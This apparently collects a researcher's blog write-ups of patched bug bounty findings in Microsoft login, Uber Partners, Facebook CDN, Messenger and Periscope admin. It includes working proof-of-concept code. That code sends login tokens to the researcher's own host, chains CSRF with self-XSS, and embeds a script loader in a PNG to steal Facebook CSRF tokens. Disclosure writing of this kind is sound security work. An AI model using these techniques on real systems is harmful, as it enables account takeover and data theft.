This is pretty similar to Wes’s awesome OAuth CSRF in Live, except it’s in the main Microsoft authentication system rather than the OAuth approval prompt.

Microsoft, being a huge company, have various services spread across multiple domains (*.outlook.com, *.live.com, and so on).

To handle authentication across these services, requests are made to login.live.com, login.microsoftonline.com, and login.windows.net to get a session for the user.

The flow for outlook.office.com is as follows:

<html>
    <head>
        <noscript>JavaScript required to sign in</noscript>
        <title>Continue</title>
        <script type="text/javascript">
            function OnBack(){}function DoSubmit(){var subt=false;if(!subt){subt=true;document.fmHF.submit();}}
        </script>
    </head>
    <body onload="javascript:DoSubmit();">
        <form name="fmHF" id="fmHF" action="https://outlook.office.com/owa/?wa=wsignin1.0" method="post" target="_self">
            <input type="hidden" name="t" id="t" value="EgABAgMAAAAEgAAAA...">
        </form>
    </body>
</html>
  • The service then consumes the token, and logs the user in.

Since the services are hosted on completely separate domains, and therefore cookies can’t be used, the token is the only value needed to authenticate as a user. This is similar-ish to how OAuth works.

What this means is that if we can get the above code to POST the value of t to a server we control, we can impersonate the user.

As expected, if we try and change the value of wreply to a non-Microsoft domain, such as example.com, we receive an error, and the request isn’t processed:

Fun with URL-Encoding and URL Parsing

One fun trick to play around with is URL-encoding parameters multiple times. Occasionally this can be used to bypass different filters, which is the root cause of the bug.

In this case, wreply is URL-decoded before the domain is checked. Therefore https%3a%2f%2foutlook.office.com%2f becomes https://outlook.office.com/, which is valid, and the request goes through.

<form name="fmHF" id="fmHF" action="https://outlook.office.com/?wa=wsignin1.0" method="post" target="_self">

What’s interesting is that when passing a value of https%3a%2f%2foutlook.office.com%252f an error is thrown, since https://outlook.office.com%2f isn’t a valid URL.

However, appending @example.com doesn’t generate an error. Instead, it gives us the following, which is a valid URL:

<form name="fmHF" id="fmHF" action="https://outlook.office.com%2f@example.com/?wa=wsignin1.0" method="post" target="_self">

If you’re wondering why this is valid, it’s because the syntax of a URL is as follows:

scheme:[//[user:password@]host[:port]][/]path[?query][#fragment]

From this you can tell that the server is doing two checks:

  • The first is a sanity check on the URL, to ensure it’s valid, which it is, since outlook.office.com%2f is the username part of the URL.

  • The second is to determine if the domain is allowed. This second check should fail - example.com is not allowed.

It’s clear that server is decoding wreply n times until there are no longer any encoded characters, and then validating the domain. This sort of inconsistency is something I’m quite familiar with.

Now that we can specify an arbitrary URL to POST the token, the rest is trivial. We set the redirect to https%3a%2f%2foutlook.office.com%252f@poc-ssl.fin1te.net%2fmicrosoft%2f%3f, which results in:

<form name="fmHF" id="fmHF" action="https://outlook.office.com%2f@poc-ssl.fin1te.net/microsoft/?&wa=wsignin1.0" method="post" target="_self">

This causes the token to be sent to our site:

Then we simply replay the token ourselves:

<form action="https://outlook.office.com/owa/?wa=wsignin1.0" method="post">
    <input name="t" value="EgABAgMAAAAEgAAAAwAB...">
    <input type="submit">
</form>

Which then gives us complete access to the user’s account:

Note: The token is only valid for the service which issued it - an Outlook token can’t be used for Azure, for example. But it’d be simple enough to create multiple hidden iframes, each with the login URL set to a different service, and harvest tokens that way.

This was quite a fun CSRF to find and exploit. Despite CSRF bugs not having the same credibility as other bugs, when discovered in authentication systems their impact can be pretty large.

Fix

The hostname in wreply now must end in %2f, which gets URL-decoded to /.

This ensures that the browser only sends the request to the intended host.

Timeline

  • Sunday, 24th January 2016 - Issue Reported
  • Sunday, 24th January 2016 - Issue Confirmed & Triaged
  • Tuesday, 26th January 2016 - Issue Patched

Now that the Uber bug bounty programme has launched publicly, I can publish some of my favourite submissions, which I’ve been itching to do over the past year. This is part one of maybe two or three posts.

On Uber’s Partners portal, where Drivers can login and update their details, I found a very simple, classic XSS: changing the value of one of the profile fields to <script>alert(document.domain);</script> causes the code to be executed, and an alert box popped.

This took all of two minutes to find after signing up, but now comes the fun bit.

Self-XSS

Being able to execute additional, arbitrary JavaScript under the context of another site is called Cross-Site Scripting (which I’m assuming 99% of my readers know). Normally you would want to do this against other users in order to yank session cookies, submit XHR requests, and so on.

If you can’t do this against another user - for example, the code only executes against your account, then this is known as a self-XSS.

In this case, it would seem that’s what we’ve found. The address section of your profile is only shown to you (the exception may be if an internal Uber tool also displays the address, but that’s another matter), and we can’t update another user’s address to force it to be executed against them.

I’m always hesitant to send in bugs which have potential (an XSS in this site would be cool), so let’s try and find a way of removing the “self” part from the bug.

Uber OAuth Login Flow

The OAuth that flow Uber uses is pretty typical:

  • User visits an Uber site which requires login, e.g. partners.uber.com
  • User is redirected to the authorisation server, login.uber.com
  • User enters their credentials
  • User is redirected back to partners.uber.com with a code, which can then be exchanged for an access token

In case you haven’t spotted from the above screenshot, the OAuth callback, /oauth/callback?code=..., doesn’t use the recommended state parameter. This introduces a CSRF vulnerability in the login function, which may or may-not be considered an important issue.

In addition, there is a CSRF vulnerability in the logout function, which really isn’t considered an issue. Browsing to /logout destroys the user’s partner.uber.com session, and performs a redirect to the same logout function on login.uber.com.

Since our payload is only available inside our account, we want to log the user into our account, which in turn will execute the payload. However, logging them into our account destroys their session, which destroys a lot of the value of the bug (it’s no longer possible to perform actions on their account). So let’s chain these three minor issues (self-XSS and two CSRF’s) together.

For more info on OAuth security, check out @homakov’s awesome guide.

Chaining Minor Bugs

Our plan has three parts to it:

  • First, log the user out of their partner.uber.com session, but not their login.uber.com session. This ensures that we can log them back into their account
  • Second, log the user into our account, so that our payload will be executed
  • Finally, log them back into their account, whilst our code is still running, so that we can access their details

Step 1. Logging Out of Only One Domain

We first want to issue a request to https://partners.uber.com/logout/, so that we can then log them into our account. The problem is that issuing a requets to this end-point results in a 302 redirect to https://login.uber.com/logout/, which destroys the session. We can’t intercept each redirect and drop the request, since the browser follows these implicitly.

However, one trick we can do is to use Content Security Policy to define which sources are allowed to be loaded (I hope you can see the irony in using a feature designed to help mitigate XSS in this context).

We’ll set our policy to only allow requests to partners.uber.com, which will block https://login.uber.com/logout/.

<!-- Set content security policy to block requests to login.uber.com, so the target maintains their session -->
<meta http-equiv="Content-Security-Policy" content="img-src https://partners.uber.com">
<!-- Logout of partners.uber.com -->
<img src="https://partners.uber.com/logout/">

This works, as indicated by the CSP violation error message:

Step 2. Logging Into Our Account

This one is relatively simple. We issue a request to https://partners.uber.com/login/ to initiate a login (this is needed else the application won’t accept the callback). Using the CSP trick we prevent the flow being completed, then we feed in our own code (which can be obtained by logging into our own account), which logs them in to our account.

Since a CSP violation triggers the onerror event handler, this will be used to jump to the next step.

<!-- Set content security policy to block requests to login.uber.com, so the target maintains their session -->
<meta http-equiv="Content-Security-Policy" content="img-src partners.uber.com">
<!-- Logout of partners.uber.com -->
<img src="https://partners.uber.com/logout/" onerror="login();">
<script>
    //Initiate login so that we can redirect them
    var login = function() {
        var loginImg = document.createElement('img');
        loginImg.src = 'https://partners.uber.com/login/';
        loginImg.onerror = redir;
    }
    //Redirect them to login with our code
    var redir = function() {
        //Get the code from the URL to make it easy for testing
        var code = window.location.hash.slice(1);
        var loginImg2 = document.createElement('img');
        loginImg2.src = 'https://partners.uber.com/oauth/callback?code=' + code;
        loginImg2.onerror = function() {
            //Redirect to the profile page with the payload
            window.location = 'https://partners.uber.com/profile/';
        }
    }
</script>

Step 3. Switching Back to Their Account

This part is the code that will be contained as the XSS payload, stored in our account.

As soon as this payload is executed, we can switch back to their account. This must be in an iframe - we need to be able to continue running our code.

//Create the iframe to log the user out of our account and back into theirs
var loginIframe = document.createElement('iframe');
loginIframe.setAttribute('src', 'https://fin1te.net/poc/uber/login-target.html');
document.body.appendChild(loginIframe);

The contents of the iframe uses the CSP trick again:

<!-- Set content security policy to block requests to login.uber.com, so the target maintains their session -->
<meta http-equiv="Content-Security-Policy" content="img-src partners.uber.com">
<!-- Log the user out of our partner account -->
<img src="https://partners.uber.com/logout/" onerror="redir();">
<script>
    //Log them into partners via their session on login.uber.com
    var redir = function() {
        window.location = 'https://partners.uber.com/login/';
    };
</script>

The final piece is to create another iframe, so we can grab some of their data.

//Wait a few seconds, then load the profile page, which is now *their* profile
setTimeout(function() {
    var profileIframe = document.createElement('iframe');
    profileIframe.setAttribute('src', 'https://partners.uber.com/profile/');
    profileIframe.setAttribute('id', 'pi');
    document.body.appendChild(profileIframe);
    //Extract their email as PoC
    profileIframe.onload = function() {
        var d = document.getElementById('pi').contentWindow.document.body.innerHTML;
        var matches = /value="([^"]+)" name="email"/.exec(d);
        alert(matches[1]);
    }
}, 9000);

Since our final iframe is loaded from the same origin as the Profile page containing our JS, and X-Frame-Options is set to sameorigin not deny, we can access the content inside of it (using contentWindow)

Putting It All Together

After combining all the steps, we have the following attack flow:

  • Add the payload from step 3 to our profile
  • Login to our account, but cancel the callback and make note of the unused code parameter
  • Get the user to visit the file we created from step 2 - this is similar to how you would execute a reflected-XSS against someone
  • The user will then be logged out, and logged into our account
  • The payload from step 3 will be executed
  • In a hidden iframe, they’ll be logged out of our account
  • In another hidden iframe, they’ll be logged into their account
  • We now have an iframe, in the same origin containing the user’s session

This was a fun bug, and proves that it’s worth persevering to show a bug can have a higher impact than originally thought.

Content uploaded to Facebook is stored on their CDN, which is served via various domains (most of which are sub-domains of either akamaihd.net or fbcdn.net).

The captioning feature of Videos also stores the .srt files on the CDN, and I noticed that right-angle brackets were un-encoded.

https://fbcdn-dragon-a.akamaihd.net/hphotos-ak-xaf1/….srt

I was trying to think of ways to get the file interpreted as HTML. Maybe MIME sniffing (since there’s no X-Content-Type-Option header)?

It’s actually a bit easier than that. We can just change the extension to .html (which probably shouldn’t be possible…).

https://fbcdn-dragon-a.akamaihd.net/hphotos-ak-xaf1/t39.2093-6/….html

Unfortunately left angles are stripped out (which I later found out was due to @phwd’s very much related finding), so there’s not much we can do here. Instead, I looked for other files which could also be loaded as text/html.

A lot of the photos/videos on Facebook now seem to contain a hash in the URL (parameters oh and __gda__), which causes an error to be thrown if we modify the file extension.

Luckily, advert images don’t contain these parameters.

All that we have to do now is find a way to embed some HTML into an image. The trouble is that Exif data is stripped out of JPEGs, and iTXt chunks are stripped out of PNGs.

If we try to blindly insert a string into an image and upload it we receive an error.

PNG IDAT Chunks

I started searching for ideas and came across this great blog post: “Encoding Web Shells in PNG IDAT chunks”. This section of this bug is made possible due that post, so props to the author.

The post describes encoding data into the IDAT chunk, which ensures it’ll stay there even after the modifications Facebook’s image uploader makes.

The author kindly provides a proof-of-concept image, which worked perfectly (the PHP shell obviously won’t execute, but it demonstrates that the data survived uploading).

Now, I could have submitted the bug there and then - we’ve got proof that images can be served with a content type of text/html, and angle brackets aren’t encoded (which means we can certainly inject HTML).

But that’s boring, and everyone knows an XSS isn’t an XSS without an alert box.

The author also provides an XSS ready PNG, which I could just upload and be done. But since it references a remote JS file, I wasn’t too keen on the bug showing up in a referer log. Plus I wanted to try myself to create one of these images.

As mentioned in post, the first step is to craft a string, that when compressed using DEFLATE, produces the desired output. Which in this case is:

<SCRIPT src=//FNT.PE><script>

Rather than trying to create this by hand, I used a brute-force solution (I’m sure there are much better ways, but I wanted to whip up a script and leave it running):

  • Convert the desired output to hex - 3c534352495054205352433d2f2f464e542e50453e3c2f7363726970743e
  • Prepend 0x00 -> 0xff to the string (one to two times)
  • Append 0x00 -> 0xff to the string (one to two times)
  • Attempt to uncompress the string until an error isn’t thrown
  • Check that the result contains our expected string

The script took a while to run, but it produced the following output:

7ff399281922111510691928276e6e5c1e151e51241f576e69b16375535b6f

Compressing the above confirms that we get our string back:

fin1te@mbp /tmp » php -r "echo gzdeflate(hex2bin('7ff399281922111510691928276e6e5c1e151e51241f576e69b16375535b6f')) . PHP_EOL;"
??<SCRIPT SRC=//FNT.PE></script>
    

Combining the result, with the PHP code for reversing PNG filters and generating the image, gives us the following:

Which, when dumped, shows our payload:

fin1te@mbp /tmp » hexdump -C xss-fnt-pe-png.png
00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|
00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 fc 18 ed  |... ... ........|
00000020  a3 00 00 00 09 70 48 59  73 00 00 0e c4 00 00 0e  |.....pHYs.......|
00000030  c4 01 95 2b 0e 1b 00 00  00 65 49 44 41 54 48 89  |...+.....eIDATH.|
00000040  63 ac ff 3c 53 43 52 49  50 54 20 53 52 43 3d 2f  |c..<SCRIPT SRC=/|
00000050  2f 46 4e 54 2e 50 45 3e  3c 2f 73 63 72 69 70 74  |/FNT.PE></script|
00000060  3e c3 ea c0 46 8d 17 f3  af de 3d 73 d3 fd 15 cb  |>...F.....=s....|
00000070  43 2f 0f b5 ab a7 af ca  7e 7d 2d ea e2 90 22 ae  |C/......~}-...".|
00000080  73 85 45 60 7a 90 d1 8c  3f 0c a3 60 14 8c 82 51  |s.E`z...?..`...Q|
00000090  30 0a 46 c1 28 18 05 a3  60 14 8c 82 61 00 00 78  |0.F.(...`...a..x|
000000a0  32 1c 02 78 65 1f 48 00  00 00 00 49 45 4e 44 ae  |2..xe.H....IEND.|
000000b0  42 60 82                                          |B`.|
    

We can then upload it to our advertiser library, and browse to it (with an extension of .html).

What can you do with an XSS on a CDN domain? Not a lot.

All I could come up with is a LinkShim bypass. LinkShim is script/tool which all external links on Facebook are forced through. This then checks for malicious content.

CDN URL’s however aren’t Link Shim’d, so we can use this as a bypass.

Moving from the Akamai CDN hostname to *.facebook.com

Redirects are pretty boring. So I thought I’d check to see if any *.facebook.com DNS entries were pointing to the CDN.

I found photo.facebook.com (I forgot to screenshot the output of dig before the patch, so here’s an entry from Google’s cache):

Browsing to this host with our image as the path loads a JavaScript file from fnt.pe, which then displays an alert box with the hostname.

Any session cookies are marked as HTTPOnly, and we can’t make requests to www.facebook.com. What do we do other than popping an alert box?

Enter document.domain

It’s possible for two pages from a different origin, but sharing the same parent domain, to interact with each other, providing they both set the document.domain property to the parent domain.

We can easily do this for our page, since we can run arbitrary JavaScript. But we also need to find a page on www.facebook.com which does the same, and doesn’t have an X-Frame-Options header set to DENY or SAMEORIGIN (we’re still cross-origin at this point).

This wasn’t too difficult to find - Facebook has various plugins which are meant to be placed inside an <iframe>.

We can use the Page Plugin. It sets the document.domain property, and also contains fb_dtsg (the CSRF token Facebook uses).

What we now need to do is load the plugin inside an iframe, wait for the onload event to fire, and extract the token from the content.

document.domain = 'facebook.com';

var i = document.createElement('iframe');
i.setAttribute('id', 'i');
i.setAttribute('style', 'visibility:hidden;width:0px;height:0px;');
i.setAttribute('src', 'https://www.facebook.com/v2.4/plugins/page.php?adapt_container_width=true&app_id=113869198637480&channel=https%3A%2F%2Fs-static.ak.facebook.com%2Fconnect%2Fxd_arbiter%2FX9pYjJn4xhW.js%3Fversion%3D41%23cb%3Df365065abc%26domain%3Ddevelopers.facebook.com%26origin%3Dhttps%253A%252F%252Fdevelopers.facebook.com%252Ff366e4bcac%26relation%3Dparent.parent&container_width=588&hide_cover=false&href=https%3A%2F%2Fwww.facebook.com%2Ffacebook&locale=en_GB&sdk=joey&show_facepile=true&show_posts=true&small_header=false');

i.onload = function(){
    alert(document.domain + "\nfb_dtsg: " + i.contentWindow.document.getElementsByName('fb_dtsg')[0].value);
};

document.body.appendChild(i);

Notice how the alert box now shows facebook.com, not photos.facebook.com.

We now have access to the user’s CSRF token, which means we can make arbitrary requests on their behalf (such as posting a status, etc).

It’s also possible to issue XHR requests via the iframe to extract data from www.facebook.com (rather than blindly post data with the token).

So it turns out an XSS on the CDN can do pretty much everything that one on the main site can.

Fix

Facebook quickly hot-fixed the issue by removing the forward DNS entry for photo.facebook.com.

Whilst the content type issue still exists, it’s a lot less severe since the files are hosted on a sandboxed domain.

Bonus ASCII Art

One easter-egg I found was that if you append .txt or .html to the URL (rather than replace the file extension), you get a cool ASCII art version of the image. This also works for images on Instagram (since they share the same CDN).

Try it out yourself:

I originally wasn’t going to publish this, but @phwd wanted to hear about some of my recent bugs so this post is dedicated to him.

This issue was also found by @mazen160, who blogged about it back in June.

When Messenger.com launched back in April, I quickly had a look for any low-hanging fruit.

One of the first things to do is check end-points for Cross-Site Request Forgery issues. This is whereby an attacker can abuse the fact that cookies are implicity sent with a request (regardless of where the request is made from), and perform actions on another users behalf, such as sending a message or updating a status.

There are different ways of mitigating this (with varying results), but usually this is achieved by sending a non-guessable token with each request, and comparing it to a value stored server-side/decrypting it and verifying the contents.

The way I normally check for these is as follows:

  1. Perform the request without modifying the parameters, so we can see what the expected result is
  2. Remove the CSRF token completely (in this case, the fb_dtsg parameter)
  3. Modify one of the characters in the token (but keep the length the same)
  4. Remove the value of the token (but leave the parameter in place)
  5. Convert to a GET request

If any of the above steps produce the same result as #1 then we know that the end-point is likely to be vulnerable (there are some instances where you might get a successful response, but in fact no data has been modified and therefore the token hasn’t been checked).

Normally, on Faceboook, the response is one of two, depending on if the request is an AJAX request or not (indicated by the __a parameter).

Either a redirect to /common/invalid_request.php:

Or an error message:

I submitted the following request to change the sound_enabled setting, without fb_dtsg:

POST /settings/edit/ HTTP/1.1
Host: www.messenger.com
Content-Type: application/x-www-form-urlencoded

settings[sound_enabled]=false&__a=1

Which surprisingly gave me the following response:

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 3559

for (;;);{"__ar":1,"payload":[],"jsmods":{"instances":[["m_a_0",["MarketingLogger"],[null,{"is_mobile":false,"controller_name":"XMessengerDotComSettingsEditController"
...

I tried another end-point, this time to remove a user from a group thread.

POST /chat/remove_participants/?uid=100...&tid=153... HTTP/1.1
Host: www.messenger.com
Content-Type: application/x-www-form-urlencoded

__a=1

Which also worked:

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 136

for (;;);{"__ar":1,"payload":null,"domops":[["replace","^.fbProfileBrowserListItem",true,null]],"bootloadable":{},"ixData":{},"lid":"0"}

After trying one more I realised that the check was missing on every request.

Fix

Simple and quick fix - tokens are now properly checked on every request.

I haven’t blogged for quite some time, so I thought it was worth re-launching with an interesting, albeit simple, high-impact bug.

Periscope is an iOS/Android app, owned by Twitter, used for live streaming. To manage the millions of users, a web-based administation panel is used, accessible at admin.periscope.tv.

When you browse to the site, all requests are redirected to /auth?redirect=/ (since we don’t have a valid session), which in turn redirects to Google for authentication.

The redirected URL, shown below, contains various parameters, but the most interesting one is hd. This is used to restrict logins to a specific domain, in this case bountyapp.co.

https://accounts.google.com/o/oauth2/auth?access_type=
&approval_prompt=
&client_id=57569323683-c0hvkac6m15h3u3l53u89vpquvjiu8sb.apps.googleusercontent.com
&hd=bountyapp.co
&redirect_uri=https%3A%2F%2Fadmin.periscope.tv%2Fauth%2Fcallback
&response_type=code
&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fplus.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.profile
&state=%2FStreams
    

If we try and login with an account such as test@gmail.com, we’re redirected back to the account selection page, and if we try again we get redirected back to the same place, and so on.

However, we can simply remove this parameter. There’s no signature in the URL to prevent us from making modifications, and as indicated in the documentation, the onus is on the application to validate the returned token.

This gives us the following login URL (you may also notice I’ve removed the Google+ scope, this is purely because my test account isn’t signed up for it):

https://accounts.google.com/o/oauth2/auth?access_type=
&approval_prompt=
&client_id=57569323683-c0hvkac6m15h3u3l53u89vpquvjiu8sb.apps.googleusercontent.com
&redirect_uri=https%3A%2F%2Fadmin.periscope.tv%2Fauth%2Fcallback
&response_type=code
&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.profile
&state=%2FStreams
    

Browsing to this new URL prompts us to authorise the application.

After clicking “Accept”, a redirect is issused back to the administation panel, with our code as a parameter.

This is where the application should then exchange the code for an access token, and validate the returned user ID against either a whitelist, or at the very least verify that the domain is bountyapp.co.

But, in this case, the assumption is made that if you managed to login, you are an employee with an @bountyapp.co email.

The requested userinfo.profile permission doesn’t contain the user’s email address, so the application can’t validate it if it tried.

This then presents us with the admin panel.

From here we can now manage various aspects of Periscope, including users and streams.

Fix

Twitter fixed this by making two changes. The first is to request an additional permission:

https://www.googleapis.com/auth/userinfo.email
    

The second is to correctly validate the user on callback.

Now, the application returns a 401 when trying to authenticate with an invalid user:

HTTP/1.1 401 Unauthorized
Content-Type: text/html; charset=utf-8
Location: /Login
Strict-Transport-Security: max-age=31536000; preload
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Xss-Protection: 1; mode=block
Content-Length: 36

<href="/Login">Unauthorized</a>.